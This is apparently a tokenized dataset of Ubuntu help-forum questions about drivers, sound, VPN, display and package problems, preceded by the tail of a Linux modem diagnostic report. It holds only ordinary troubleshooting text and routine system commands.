/devices/pci0000:00/0000:00:1b.0/sound/card0/input8 [ 8.050054 ] input : hda intel front mic as /devices/pci0000:00/0000:00:1b.0/sound/card0/input9 [ 8.050141 ] input : hda intel rear mic as /devices/pci0000:00/0000:00:1b.0/sound/card0/input10 the pci slot 00:1b.0 of the modem card may be disabled early in a bootup process , but then enabled later . if modem drivers load but the modem is not responsive , read docs/bootup.txt about possible fixes . send dmesg.txt along with modemdata.txt to discuss @ linmodems.org if help is needed . for candidate card in slot 01:00.1 , firmware information and bootup diagnostics are : pci slot pci id subsystemid name -- -- -- -- -- -- -- -- -- - -- -- -- -- - -- -- -- -- -- -- -- 01:00.1 10de:0be2 1043:8311 audio device : nvidia corporation high definition audio controller modem interrupt assignment and sharing : 16 : 1908 200 21900 30776 io-apic-fasteoi uhci_hcd : usb5 , nouveau , snd_hda_intel -- - bootup diagnostics for card in pci slot 01:00.1 -- -- [ 0.126558 ] pci 0000:01:00.1 : [ 10de:0be2 ] type 00 class 0x040300 [ 0.126569 ] pci 0000:01:00.1 : reg 0x10 : [ mem 0xfcffc000-0xfcffffff ] [ 10.434551 ] hda-intel 0000:01:00.1 : handle vga-switcheroo audio client [ 10.434593 ] hda-intel 0000:01:00.1 : disabling 64bit dma [ 10.440434 ] hda-intel 0000:01:00.1 : enable delay in rirb handling [ 11.272108 ] input : hda nvidia hdmi/dp , pcm=9 as /devices/pci0000:00/0000:00:01.0/0000:01:00.1/sound/card1/input12 [ 11.272264 ] input : hda nvidia hdmi/dp , pcm=8 as /devices/pci0000:00/0000:00:01.0/0000:01:00.1/sound/card1/input13 [ 11.272347 ] input : hda nvidia hdmi/dp , pcm=7 as /devices/pci0000:00/0000:00:01.0/0000:01:00.1/sound/card1/input14 [ 11.272421 ] input : hda nvidia hdmi/dp , pcm=3 as /devices/pci0000:00/0000:00:01.0/0000:01:00.1/sound/card1/input15 the pci slot 01:00.1 of the modem card may be disabled early in a bootup process , but then enabled later . if modem drivers load but the modem is not responsive , read docs/bootup.txt about possible fixes . send dmesg.txt along with modemdata.txt to discuss @ linmodems.org if help is needed . === finished firmware and bootup diagnostics , next deducing cogent software . === predictive diagnostics for card in bus 04:02.0 : modem chipset detected on name= '' modem : smart link ltd. lm-i56n `` class=0703 pcidev=2003:8800 subsys=16ef:2800 irq=18 hda2=00:1b.0 hda2=01:00.1 ident=slamr for candidate modem in : 04:02.0 0703 modem : smart link ltd. lm-i56n primary device id : 2003:8800 support type needed or chipset : slamr there is a package sl-modem-source providing a source code the modem driver , if can be searched for at after downloading install under linux with : $ sudo dpkg -i sl*.deb it is preferable to install the dkms package first . with dkms support installed , driver updates with kernel updates will be automatically done . the modem is supported by the smartlink plus the slmodemd helper utility . read the docs/smartlink.txt and modem/docs/yoursystem.txt for follow through guidance . for 3.11.0-15-generic compiling drivers is necessary . as of october 2007 the current packages at writing docs/smartlink.txt ============ end smartlink section ===================== predictive diagnostics for card in bus 00:1b.0 : modem chipset not detected on name= '' audio device : intel corporation nm10/ich7 family high definition audio controller `` class=0403 pcidev=8086:27d8 subsys=1458 : a002 irq=44 for candidate modem in : 00:1b.0 0403 audio device : intel corporation nm10/ich7 family high definition audio controller primary device id : 8086:27d8 support type needed or chipset : predictive diagnostics for card in bus 01:00.1 : modem chipset not detected on name= '' audio device : nvidia corporation high definition audio controller `` class=0403 pcidev=10de:0be2 subsys=1043:8311 irq=16 for candidate modem in : 01:00.1 0403 audio device : nvidia corporation high definition audio controller primary device id : 10de:0be2 support type needed or chipset : completed candidate modem analyses . the base of the udev device file system is : /dev/.udev versions adequately match for the compiler installed : 4.6.3 and the compiler used in kernel assembly : 4.6 linux-headers-3.11.0-15-generic resources needed for compiling are not manifestly ready ! if compiling is necessary packages must be installed , providing : linux-headers-3.11.0-15-generic if a driver compilation fails , with message including some lack of some filename.h ( stdio.h for example ) , then some additional kernel-header files need installation to /usr/include . the minimal additional packages are libc6-dev and any of its dependents , under ubuntu linux-libc-dev if an alternate ethernet connection is available , $ apt-get update $ apt-get -s install linux-kernel-devel will install needed packages . for debian/ubuntu related distributions , run the following command to display the needed package list : otherwise packages have to be found through once downloaded and transferred into a linux partition , they can be installed alltogether with : $ sudo dpkg -i *.deb checking pppd properties : -rwsr-xr -- 1 root dip 273272 feb 4 2011 /usr/sbin/pppd in case of an `` error 17 '' `` serial loopback '' problem , see : to enable dialout without root permission do : $ su - root ( not for ubuntu ) sudo chmod a+x /usr/sbin/pppd or under ubuntu related linuxes sudo chmod a+x /usr/sbin/pppd checking settings of : /etc/ppp/options asyncmap 0 noauth crtscts lock hide-password modem lcp-echo-interval 30 lcp-echo-failure 4 noipx in case of a message like : warning : could not modify /etc/ppp/pap-secrets : permission denied see for guidance on fax usage , get from it has samples for a modem using port /dev/ttysl0 , which must be changed to match your modem 's port . read modem/docs/yoursystem.txt concerning other comm channels : eth0 which can interfere with browser naviagation . do n't worry about the following , it is for experts should trouble shooting be necessary . checking for modem support lines : /device/modem symbolic link : slmodemd created symbolic link /dev/ttysl0 : within /etc/udev/ files : within /etc/modprobe.conf files : /etc/modprobe.d/blacklist-modem.conf : # uncomment these entries in order to blacklist unwanted modem drivers /etc/modprobe.d/blacklist-modem.conf : # blacklist snd-atiixp-modem /etc/modprobe.d/blacklist-modem.conf : # blacklist snd-via82xx-modem /etc/modprobe.d/alsa-base.conf : options snd-atiixp-modem index=-2 /etc/modprobe.d/alsa-base.conf : options snd-via82xx-modem index=-2 /etc/modprobe.d/sl-modem.conf : install slamr /sbin/modprobe -qb ungrab-winmodem ; /sbin/modprobe -- ignore-install slamr ; test -e /dev/slamr0 & & ( chmod 660 /dev/slamr0 & & chgrp dialout /dev/slamr0 ) || ( /bin/mknod -m 660 /dev/slamr0 c 242 0 2 > /dev/null & & chgrp dialout /dev/slamr0 ) /etc/modprobe.d/sl-modem.conf : install slusb /sbin/modprobe -qb ungrab-winmodem ; /sbin/modprobe -- ignore-install slusb ; test -e /dev/slusb0 & & ( chmod 660 /dev/slusb0 & & chgrp dialout /dev/slusb0 ) || ( /bin/mknod -m 660 /dev/slusb0 c 243 0 2 > /dev/null & & chgrp dialout /dev/slusb0 ) within any ancient /etc/devfs files : within ancient kernel 2.4.n /etc/module.conf files : -- -- -- -- - end modem support lines -- -- -- --
422319	ca n't get external speakers to work on alienware m17x r4	i 've tried every possibility i 've found and still nothing ! ! upon trying to turn up volume in alsa mixer i 've found that only the first two boxes ( pcm and master ) are the only ones i 'm able to turn up ... the rest of the options remain at 00 . i have also run the following command in the terminal `` sudo gedit /etc/modprobe.d/alsa-base.conf '' ( with no quotations ) and added `` options snd-hda-intel model=alienware '' ( also with no quotations ) . neither one has come close to working . also i have found that the sound test in system settings/sound does n't work anymore . please help ! ! ! ! ! ! !
422324	missing window title bar when drag window	couple days ago i noticed i have a lot of problems with unity , one of them is when window is maximized , and when i unmaximize it by dragging it from unity panel , title bar dissapears , and global menu turns off for all windows . so i have to restart computer in order to get everything back . how to fix this ?
422328	what is the concept of only close window button in gnome shell	how to add minimize and maximize button in gnome-shell is a common question . my question is why gnome developer removed them ? there should be a explanation . i am sure that they do it for more easy and sophisticated user experience , but how it improves the user experience ? maximize functionality can be done using drag window to top panel or left/right . but what about minimize ? another question is that why left launcher is hidden ? i would have no idea about the opened application until i hit activities ( spread view ) . i know , i have asked it late . but i really want to know .
422329	steam games not as smooth as they should	i 'm new in this ubuntu world . i 'm trying out ubuntu 13.10 , and my goal is to customize it as far as i 'm comfortable with . but now i 'm at a breaking point : i 'm a gamer , and i really want ubuntu to fulfill my gaming expectancies ( taking away the few titles that are out there for ubuntu ) , since i 'm tired of windows . i 'm trying out left 4 dead 2 here , but i 'm experiencing a lower fps rate than with windows , and for some reason after playing some minutes my cpu reaches critical ussage levels . this game is my test subject since it 's valve 's official ( steam 's original ) and it 's a game that does not consume too much . for the cpu problem : this used to happen when it was overheating , but i 've cleaned every part now , and i directed a ventilator to the pc , wich should solve that problem . i also installed some heavy ( in pc ussage terms ) programs like `` live wallpaper '' , wich , of course , i closed when i noticed the problem . i have an amd phenom 3 x2 black edition . it was never before a cpu capacity problem . for the gpu problem : it showed an absurd ( positive ) change when i downscaled the antiaisling and filtering modes , i used them in 8x both , and now , i 'm using them in 4x ( wich kind of upsets me ) . i have an nvidia 460 oc from factory , and using the official privative nvidia xorg drivers , v 319 ( newest that i have avalible ) . could it be that these are not the best drivers for heavy gaming ? is oibaf better ? sorry for my bad english , i hope someone could help me to get better preformance from this . thanks
422330	ubuntu 13.10 audio not working properly . partially working	i got a compaq presario cq61 and i just installed ubuntu 13.10 . i 've seen a lot of people that got a problem with no sound in computer . mine it 's a little bit different . sound works , but not properly . first , when i connect earphones the sound it 's too low , although sometimes ( and randomly ) works fine . no issues with laptop speakers . i ca n't hear sounds from sound-indicator when i put the volume up or down . when streaming video , audio goes out of sync . i tried to find a solution but most people have an issue with no sound . as i said , mine works but very poorly .
422332	mb860 upgrade to ubuntu	i saw on your video that you are using motorola mb860 phone as a desktop computer . can i install ubuntu to this type of phone for myself ? i would create a kit with this phone and a dock with your os and let it to order . is there already a kit for this ?
422338	skipping refind menu after option+command+p+r and going straight to grub	i used option+command+p+r to try and fix a sleep issue in osx . from there i 'm a little confused about what happened but i ended up in a mac recovery mode ( offering to reinstall osx ) , which i tried to exit out of as quickly as possible . when it rebooted , it seems to be jumping straight to grub , which needs telling which partition to boot and i ca n't boot osx ( only ubuntu ) . it 's as though i 've changed the active partition ( is that even relevant for efi ? ) . can this be fixed from inside ubuntu ? i have a retina display macbook , so no cd , and i 'd like to fix this from inside ubuntu ideally .
422341	how can i detect motion in a long , mostly dull video ?	i need a way to scan through hours and hours of recorded video ( mp4 , mov , avi , does n't matter , i can fix that ) to search for motion . the videos consist of many , many hours of dull nature scenes like bird nests or a feeding site where very little happens for long stretches punctuated by short bursts of action like parents switching , feeding , etc . i ca n't us a cctv monitoring program because those monitor a live stream and only record when there 's action . these videos are recorded way off the grid where any form of internet connection is a distant dream . i 've looked at zoneminder and motion , but these do n't allow me to switch the input from a live feed to a file . ideally , i 'd like it to scan a whole lot faster than real-time . any ideas ?
422342	hp officejet 8600 pro duplex scanning	i have an hp officejet 8600 pro that i use with hplip and i am having troubles with scanning on ubuntu 12.04 lts . i can not do manual duplex scanning with simple scan , gscan2pdf , where nothing is displayed after any scan and even xsane . can you guys recommend a software which can do such ?
422351	no keyboard/mouse access after apt-get dist-upgrade	so i just installed ubuntu on my computer as a dual boot following instructions found here . ubuntuforums.org/showthread.php ? t=1563565 everything worked perfectly , until i decided to use apt-get dist-upgrade . it went on updated everything until my screen turned real funky . i had the ubuntu logo in the corner and could not see the desktop well , black took over most parts of it , but i can still see the dock . the mouse seemed to work but i couldnt see anything so i decided for a manual boot off . after that , i tried to reboot , everything seemed to work well . but when i got on it told me i had an error and surprisingly there were no cursor access or i can not do anything with my keyboard . naturally i decided to go to the recovery menu where i found , that i can not access the keyboard that way either ... i 'm not sure what to do next ... keyboard does however work in grub . thanks
422353	what does `` xhci_queue_intr_tx : 70 callbacks suppressed '' mean in my log files ?	i got this message at the log file viewer and it continues all the time.. i have ubuntu 12.04 lts on a samsung core i5 that uses an amd radeon graphic card . what does this mean ? feb 17 23:51:01 adhemar-530u4e-540u4e kernel : [ 901.730745 ] xhci_queue_intr_tx : 70 callbacks suppressed feb 17 23:51:06 adhemar-530u4e-540u4e kernel : [ 906.849129 ] xhci_queue_intr_tx : 73 callbacks suppressed feb 17 23:51:11 adhemar-530u4e-540u4e kernel : [ 911.967473 ] xhci_queue_intr_tx : 70 callbacks suppressed feb 17 23:51:16 adhemar-530u4e-540u4e kernel : [ 917.081837 ] xhci_queue_intr_tx : 70 callbacks suppressed feb 17 23:51:21 adhemar-530u4e-540u4e kernel : [ 922.200305 ] xhci_queue_intr_tx : 70 callbacks suppressed feb 17 23:51:27 adhemar-530u4e-540u4e kernel : [ 927.318578 ] xhci_queue_intr_tx : 70 callbacks suppressed feb 17 23:51:32 adhemar-530u4e-540u4e kernel : [ 932.436994 ] xhci_queue_intr_tx : 70 callbacks suppressed
422354	hard drive ( hfsplus ) will not allow me to chown or chmod	i tried chmod and chown , neither worked and i got a message like this , repeated for every file in the drive . chmod : changing permissions of ‘folder/filename.id’ : read-only file system failed to change mode of ‘folder/filename.id’ from 0644 ( rw-r -- r -- ) to 0777 ( rwxrwxrwx ) i am trying to gain control of this drive , but it says the owner is `` user # 99 '' and the group is `` 99 '' i 've looked all over the forum for an answer , but most of the answers direct me to chmod or chown or both , and almost none of these are mac ( hfsplus ) drives .
422356	wiimote and ubuntu 13.10	i 'm having some issues with wiican , i ca n't get it to find the wiimote because the uinput module does n't load no matter what i do ( it worked fine on 13.04 ) , what 's the proper way to load uinput ? there 's any alternative to wiican ? thanks in advance
422357	unable to update package manager due to syntax error	i noticed my package manager was not updating and kept giving an error about third party repo 's so i disabled them and tried to run sudo apt-get update & & sudo apt-get install -f & & sudo apt-get update however it seems the hplip package is not allowing me to do this . i get this error message from the terminal : ( reading database ... 253351 files and directories currently installed . ) preparing to replace hplip-data 3.13.9-1 ( using ... /hplip-data_3.13.9-1ubuntu0.1_all.deb ) ... file `` /usr/bin/pyclean '' , line 63 except ( ioerror , oserror ) , e : ^ syntaxerror : invalid syntax dpkg : warning : subprocess old pre-removal script returned error exit status 1 dpkg : trying script from the new package instead ... file `` /usr/bin/pyclean '' , line 63 except ( ioerror , oserror ) , e : ^ syntaxerror : invalid syntax dpkg : error processing /var/cache/apt/archives/hplip-data_3.13.9-1ubuntu0.1_all.deb ( -- unpack ) : subprocess new pre-removal script returned error exit status 1 traceback ( most recent call last ) : file `` /usr/bin/pycompile '' , line 35 , in < module > from debpython.version import supported , debsorted , vrepr , \ file `` /usr/share/python/debpython/version.py '' , line 24 , in < module > from configparser import safeconfigparser importerror : no module named 'configparser' dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : /var/cache/apt/archives/hplip-data_3.13.9-1ubuntu0.1_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i 've tried deleting the .deb package from /var/cache/apt but it still gives the same error . any ideas ?
422360	how change file attributes to make it executable	i want to execute a text file , but i need to change the file preferences so that when i open it , it will actually run the file instead displaying it . however , i do n't know how to change the file preferences .
422362	very small package for apt-get experimentation ?	i spent a lot of time this weekend installing and uninstalling kmines to test out options on apt-get install , subshells , and the like . is there a very small , simple package -- perhaps with no manpages -- that is good for quick demo installations and purges ? minimizing installation and purge time is the goal .
422366	nvidia drivers ruining fresh ubuntu install	pc specs : gtx 780 , asrock z87extreme 6 , 4770k i7 i successfully install ubuntu via usb from the live desktop , though i can only reach the desktop by setting the launcher to nomodeset . if i do not , i get to the desktop wallpaper , hear bongos , and then nothing else appears . after install , i launch ubuntu from the boot loader and it runs fine . the only noticeable issue is that everything is very large , as if the screen is 800x600 or so . then , i install the video drivers and am told to reboot . after rebooting , i can no longer reach the desktop . this error appears : *error* can not initialize the agpgart module . drm fill_in_dev failed and i am sent to a fullscreen black and white console , where i can issue commands . i do not know enough about linux/ubuntu to know what to do here and i just perform a fresh install and try again . i have tried the official drivers from nvidia . i have installed via terminal current-nvidia and nvidia-331 . i have tried both 13.10 and 12.04 . they all end up with the same results . any ideas ?
422376	what are the licensing policies for ubuntu-based virtual appliance on vsphere ?	i am looking to release my software application package as an ubuntu appliance for vsphere ( in the form of an ova ) . are there any licensing restrictions around such a distribution ? my software application is not distributed on the appliance as open-source . would appreciate a response . tia
422378	unable to start eclipse kepler without root	please find my information . operation system : ubuntu 13.10 java sdk : java version `` 1.8.0 '' java ( tm ) se runtime environment ( build 1.8.0-b129 ) java hotspot ( tm ) 64-bit server vm ( build 25.0-b69 , mixed mode ) ashish @ ashish-thinkpad-edge-e430 : ~ $ problem : when i start eclipse without root access i get following error . but if i start with root access it start , though i get some warning from java 8
422380	pptpd is useable after startup but fails after some successful connections	i setup a serve for virtualization . there is a bridge connecting each virtual machine and i have to use vpn to direct control from my development machine and sync data . it't used to worked well , but in recent , i can not get connect to it from my macbook repeatedly after some successful connection , here is the log . feb 19 06:32:04 shisoft-vmhost pptpd [ 7886 ] : mgr : launching /usr/sbin/pptpctrl to handle client feb 19 06:32:04 shisoft-vmhost pptpd [ 7886 ] : ctrl : local address = 10.2.0.1 feb 19 06:32:04 shisoft-vmhost pptpd [ 7886 ] : ctrl : remote address = 10.2.0.2 feb 19 06:32:04 shisoft-vmhost pptpd [ 7886 ] : ctrl : pppd options file = /etc/ppp/pptpd-options feb 19 06:32:04 shisoft-vmhost pptpd [ 7886 ] : ctrl : client 10.0.1.104 control connection started feb 19 06:32:04 shisoft-vmhost pptpd [ 7886 ] : ctrl : received pptp control message ( type : 1 ) feb 19 06:32:04 shisoft-vmhost pptpd [ 7886 ] : ctrl : made a start ctrl conn rply packet feb 19 06:32:04 shisoft-vmhost pptpd [ 7886 ] : ctrl : i wrote 156 bytes to the client . feb 19 06:32:04 shisoft-vmhost pptpd [ 7886 ] : ctrl : sent packet to client feb 19 06:32:04 shisoft-vmhost pptpd [ 7886 ] : ctrl : received pptp control message ( type : 7 ) feb 19 06:32:04 shisoft-vmhost pptpd [ 7886 ] : ctrl : set parameters to 100000000 maxbps , 64 window size feb 19 06:32:04 shisoft-vmhost pptpd [ 7886 ] : ctrl : made a out call rply packet feb 19 06:32:04 shisoft-vmhost pptpd [ 7886 ] : ctrl : starting call ( launching pppd , opening gre ) feb 19 06:32:04 shisoft-vmhost pptpd [ 7886 ] : ctrl : pty_fd = 6 feb 19 06:32:04 shisoft-vmhost pptpd [ 7886 ] : ctrl : tty_fd = 7 feb 19 06:32:04 shisoft-vmhost pptpd [ 7886 ] : ctrl : i wrote 32 bytes to the client . feb 19 06:32:04 shisoft-vmhost pptpd [ 7886 ] : ctrl : sent packet to client feb 19 06:32:04 shisoft-vmhost pptpd [ 7887 ] : ctrl ( pppd launcher ) : program binary = /usr/sbin/pppd feb 19 06:32:04 shisoft-vmhost pptpd [ 7887 ] : ctrl ( pppd launcher ) : local address = 10.2.0.1 feb 19 06:32:04 shisoft-vmhost pptpd [ 7887 ] : ctrl ( pppd launcher ) : remote address = 10.2.0.2 feb 19 06:32:04 shisoft-vmhost pptpd [ 7886 ] : ctrl : received pptp control message ( type : 15 ) feb 19 06:32:04 shisoft-vmhost pptpd [ 7886 ] : ctrl : got a set link info packet with standard accms feb 19 06:32:19 shisoft-vmhost pptpd [ 24351 ] : ctrl : closing child bcrelay with pid 24352 feb 19 06:32:19 shisoft-vmhost pptpd [ 7950 ] : mgr : connections limit ( 100 ) reached , extra ip addresses ignored feb 19 06:32:19 shisoft-vmhost pptpd [ 7951 ] : ctrl : bcrelay incoming interface is eth0 feb 19 06:32:19 shisoft-vmhost pptpd [ 7951 ] : mgr : manager process started feb 19 06:32:19 shisoft-vmhost pptpd [ 7952 ] : ctrl ( bcrelay launcher ) : launching bcrelay with pid 0 feb 19 06:32:19 shisoft-vmhost pptpd [ 7951 ] : mgr : maximum of 100 connections available feb 19 06:32:19 shisoft-vmhost pptpd [ 7952 ] : mgr : bcrelay incoming interface is eth0 feb 19 06:32:19 shisoft-vmhost pptpd [ 7952 ] : mgr : bcrelay outgoing interface is regexp ppp [ 0-9 ] . * feb 19 06:32:26 shisoft-vmhost pptpd [ 7977 ] : mgr : launching /usr/sbin/pptpctrl to handle client feb 19 06:32:26 shisoft-vmhost pptpd [ 7977 ] : ctrl : local address = 10.2.0.1 feb 19 06:32:26 shisoft-vmhost pptpd [ 7977 ] : ctrl : remote address = 10.2.0.2 feb 19 06:32:26 shisoft-vmhost pptpd [ 7977 ] : ctrl : pppd options file = /etc/ppp/pptpd-options feb 19 06:32:26 shisoft-vmhost pptpd [ 7977 ] : ctrl : client 10.0.1.3 control connection started feb 19 06:32:26 shisoft-vmhost pptpd [ 7977 ] : ctrl : received pptp control message ( type : 1 ) feb 19 06:32:26 shisoft-vmhost pptpd [ 7977 ] : ctrl : made a start ctrl conn rply packet feb 19 06:32:26 shisoft-vmhost pptpd [ 7977 ] : ctrl : i wrote 156 bytes to the client . feb 19 06:32:26 shisoft-vmhost pptpd [ 7977 ] : ctrl : sent packet to client feb 19 06:32:26 shisoft-vmhost pptpd [ 7977 ] : ctrl : received pptp control message ( type : 7 ) feb 19 06:32:26 shisoft-vmhost pptpd [ 7977 ] : ctrl : set parameters to 100000000 maxbps , 64 window size feb 19 06:32:26 shisoft-vmhost pptpd [ 7977 ] : ctrl : made a out call rply packet feb 19 06:32:26 shisoft-vmhost pptpd [ 7977 ] : ctrl : starting call ( launching pppd , opening gre ) feb 19 06:32:26 shisoft-vmhost pptpd [ 7977 ] : ctrl : pty_fd = 6 feb 19 06:32:26 shisoft-vmhost pptpd [ 7977 ] : ctrl : tty_fd = 7 feb 19 06:32:26 shisoft-vmhost pptpd [ 7977 ] : ctrl : i wrote 32 bytes to the client . feb 19 06:32:26 shisoft-vmhost pptpd [ 7977 ] : ctrl : sent packet to client feb 19 06:32:26 shisoft-vmhost pptpd [ 7978 ] : ctrl ( pppd launcher ) : program binary = /usr/sbin/pppd feb 19 06:32:26 shisoft-vmhost pptpd [ 7978 ] : ctrl ( pppd launcher ) : local address = 10.2.0.1 feb 19 06:32:26 shisoft-vmhost pptpd [ 7978 ] : ctrl ( pppd launcher ) : remote address = 10.2.0.2 feb 19 06:32:26 shisoft-vmhost pptpd [ 7977 ] : ctrl : received pptp control message ( type : 15 ) feb 19 06:32:26 shisoft-vmhost pptpd [ 7977 ] : ctrl : got a set link info packet with standard accms feb 19 06:32:34 shisoft-vmhost pptpd [ 7886 ] : ctrl : eof or bad error reading ctrl packet length . feb 19 06:32:34 shisoft-vmhost pptpd [ 7886 ] : ctrl : could n't read packet header ( exit ) feb 19 06:32:34 shisoft-vmhost pptpd [ 7886 ] : ctrl : ctrl read failed feb 19 06:32:34 shisoft-vmhost pptpd [ 7886 ] : ctrl : reaping child ppp [ 7887 ] feb 19 06:32:34 shisoft-vmhost pptpd [ 7886 ] : ctrl : client 10.0.1.104 control connection finished feb 19 06:32:34 shisoft-vmhost pptpd [ 7886 ] : ctrl : exiting now feb 19 06:32:56 shisoft-vmhost pptpd [ 7977 ] : ctrl : eof or bad error reading ctrl packet length . feb 19 06:32:56 shisoft-vmhost pptpd [ 7977 ] : ctrl : could n't read packet header ( exit ) feb 19 06:32:56 shisoft-vmhost pptpd [ 7977 ] : ctrl : ctrl read failed feb 19 06:32:56 shisoft-vmhost pptpd [ 7977 ] : ctrl : reaping child ppp [ 7978 ] feb 19 06:32:56 shisoft-vmhost pptpd [ 7977 ] : ctrl : client 10.0.1.3 control connection finished feb 19 06:32:56 shisoft-vmhost pptpd [ 7977 ] : ctrl : exiting now feb 19 06:32:56 shisoft-vmhost pptpd [ 7951 ] : mgr : reaped child 7977 it stuck when client is waiting something until timeout.i really have no idea because it is in my local network and there is no firewall , even ufw is turned off . here is the pptpd-options name pptpd refuse-pap refuse-chap refuse-mschap require-mschap-v2 require-mppe-128 ms-dns 8.8.8.8 ms-wins 8.8.8.8 proxyarp nodefaultroute debug lock nobsdcomp i am running on ubuntu 12.04 lts , kernel is linux shisoft-vmhost 3.13.3-031303-generic # 201402131842 smp thu feb 13 23:43:57 utc 2014 x86_64 x86_64 x86_64 gnu/linux
422383	ubuntu gnome 13.10 unresponsive login screen/gdm	i am currently using ubuntu gnome 13.10 , and i have hardly used it yet . i have installed a couple basic programs off of the software center , but nothing much . however , now , whenever my computer boots up , it shows the ubuntu gnome login screen . i see all my users and everything , but i can not use the mouse to select a user or use the keyboard . it seems to be completely frozen and unresponsive , but the screen blanking after 10 minutes or so still works . otherwise , nothing else seems to work . i 've tried ctrl+alt+1 to get to the terminal , and it still does n't work . ideas ? edit : alt+sysrq+reisub does not work . i will post my /var/log/xorg.0.log shortly
422385	i have a mac os x server running a fqdn web site , with ubuntu vbox running on top:	i want to have a subdomain point to another computer on my network ( technically it 's an ubuntu vbox on same server , but with different ip . ) , but lets just say i started apache on another computer on the home network so that it serves a subdomain name of the fqdn . router is set up correctly opening incoming ports to each specific ip , so not sure why when i access the subdomain via the web it defaults to main site . something is being either re-directed incorrectly or just not able to get through to the computer on local net . main server of the fqdn is mac os x server ( for now ) , could fully convert it over to ubuntu ... but i want to keep the mail service and jabberd service going on the mac server side . maybe setting the subdomain name as an ns on my dyndns.org account ... ? ? stumped .
422386	why am i not able to open or extract .zip files ? how can i fix this ?	many times since i have gotten ubuntu on my samsung chromebook ( that itself being a grueling process ) i have tried to extract files . but , every time , no matter what .zip file i am trying to extract , i get this message `` could not open archive , mime-type unsupported or file did not exist '' . i would be glad to provide any other needed info . just tell me what you need !
422387	how to remove adobe reader	the first time i installed adobe reader , i was n't satisfied , so i wanted to upgrade to new version . i do n't remember which method i used to remove the first time . then i did install adobe reader 11 , but it was n't perfectly working in my ubuntu using wine so i removed it . only then i realized that the first adobe reader installed was n't removed completely . again i installed adobe reader 9 from the software center . it works good , but the problem is i can not open .pdf files directly , i have to select the second adobe reader in right click menu to open it . how can i remove the first adobe reader completely ?
422388	how to `` simply '' execute commands when connected to a specific network without wicd if-up or cuttlefish	1 ) getting /etc/network/if-up is too complicated and just not working . i do n't want to do it this way anyways . on android i can do this simply with tasker . 2 ) cuttlefish would have been a good option except that it has n't seen any development in a while and it 's effectiveness is hit and miss . it honestly works when it feels like it . 3 ) wicd actually seems to work but then it tries to replace the panel 's network manager/ indicator . and then the indicator icon for managing the network becomes useless . rant : this is linux right ? this should be the point at which linux towers above the rest -- the ease , simplicity , and dependability of quick scripting . i am baffled that it is still this difficult . an answer to this question would be : 1 ) a scripting method less complex/advanced than /etc/network/interfaces and less hit and miss ( install it , write it and it works , no troubleshooting for hours ) 2 ) a program like cuttlefish that is more dependable ( actually works without troubleshooting ) 3 ) a way to use wicd to do it and keep usability with my network app indicator in the system tray area .
422396	errors during boot up of ubuntu 12.04 ( related to swap , intallation )	i 'm using ubuntu installed on usb external hard disk.. during installation , i had to allocate drive for /boot and /swap ... i could n't create a partition within my external hard drive itself ... so i finished my installation without creating swap ... i do n't experience any problems when using ubuntu.. the problem is when booting , i get some error messages for around 30 seconds after which the ubuntu starts up normally . i 'm not sure if it 's because of not allocating swap.. what could be the solution
422398	autostart openvpn client in lubuntu	i 'm currently using network connections manager to manually make an openvpn connection from a lubuntu client machine to an openvpn server . is there a way to automatically make the client connection during startup when lubuntu boots ? i ca n't find a working solution online . the client.conf file is currently in /etc/openvpn thanks !
422399	hack to get system tray applets into the app indicator ( without sni-qt )	according to many the system tray is legacy software that these many do not wish to further support . at the same time many useful applets do not work with the application indicator and there are no future updates in sight . how can i hack all the system tray applets to show up in the application indicator ( without using sni-qt ) which does n't work ?
422401	how do address these warning 's when i open firefox from the terminal ?	when i open my firefox web browser from the terminal i get these following warnings . william @ william-ao722 : ~ $ firefox ( process:5672 ) : glib-critical ** : g_slice_set_config : assertion 'sys_page_size == 0 ' failed ( firefox:5672 ) : glib-gobject-warning ** : attempt to add property gnomeprogram : :sm-connect after class was initialised ( firefox:5672 ) : glib-gobject-warning ** : attempt to add property gnomeprogram : :show-crash-dialog after class was initialised ( firefox:5672 ) : glib-gobject-warning ** : attempt to add property gnomeprogram : :display after class was initialised ( firefox:5672 ) : glib-gobject-warning ** : attempt to add property gnomeprogram : :default-icon after class was initialised is there a way that i can get rid of these warnings ? also can anyone tell me what glib is and what is it for ? i am running ubuntu 13.10
422402	alternative to github-cli after precise	$ ghi the program 'ghi ' is currently not installed . you can install it by typing : sudo apt-get install github-cli $ sudo apt-get install github-cli reading package lists ... done building dependency tree reading state information ... done e : unable to locate package github-cli $ uname -a linux machine-t440s 3.8.0-35-generic # 50-ubuntu smp tue dec 3 01:24:59 utc 2013 x86_64 x86_64 x86_64 gnu/linux packages.ubuntu.com says it 's available only on precise but i 'd just like the similar feature of this ( particularly like this one ) . is there any alternative available for newer ubuntu distros ? ( by the way i know i should not be on raring now that no one takes care of it ) .
422406	how fast can ubuntu 13.10 drive an intel dual-band 7260 ?	i have a system76 laptop with an i7 and intel dual-band 7260 card . it runs ubuntu 13.10 . my router is a netgear r7000 . i have a gigabit connection . going through the router over ethernet , various speedtest sites ( http : //speedtest.net , http : //speeds.mygrande.net/ , http : //speedtest.comcast.net/ ) rate my connection at 700-900mbps . going over wireless , talking over the 5ghz channel , sitting five feet away from the router , i can get about 300mbps . should the 13.10 intel driver with the iwlwifi-7260-ucode-22.1 firmware be able to go faster than 300mbps ?
422408	screen display shows lines	since installing ubuntu there is a background of alternating black and white lines ( similar to a basket weave ) . the distro works just fine but icons and taskbars show these lines .
422410	problems installing matlab via iso r2013a on ubuntu 13.10	i mounted the matlab for linux iso image to local drive and tried to run ./install and a installation dialog box even appeared asking all the required details but when i pressed finish to begin installation this error appeared the application encountered an unexpected error and needs to close . you may want to try re-installing your product ( s ) . more information can be found at /tmp/mathworks_root.log and i have checked many forums and i couldnot get any posts regarding this sort of error . please help . log file has ( feb 17 , 2014 21:02:02 ) # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # ( feb 17 , 2014 21:02:02 ) # ( feb 17 , 2014 21:02:02 ) # today 's date : ( feb 17 , 2014 21:02:02 ) mon feb 17 21:02:02 ist 2014 ( feb 17 , 2014 21:02:02 ) ( feb 17 , 2014 21:02:02 ) system info ( feb 17 , 2014 21:02:02 ) os : linux 3.11.0-15-generic ( feb 17 , 2014 21:02:02 ) arch : amd64 ( feb 17 , 2014 21:02:02 ) data model : 64 ( feb 17 , 2014 21:02:02 ) language : en ( feb 17 , 2014 21:02:02 ) java vendor : sun microsystems inc. ( feb 17 , 2014 21:02:02 ) java home : 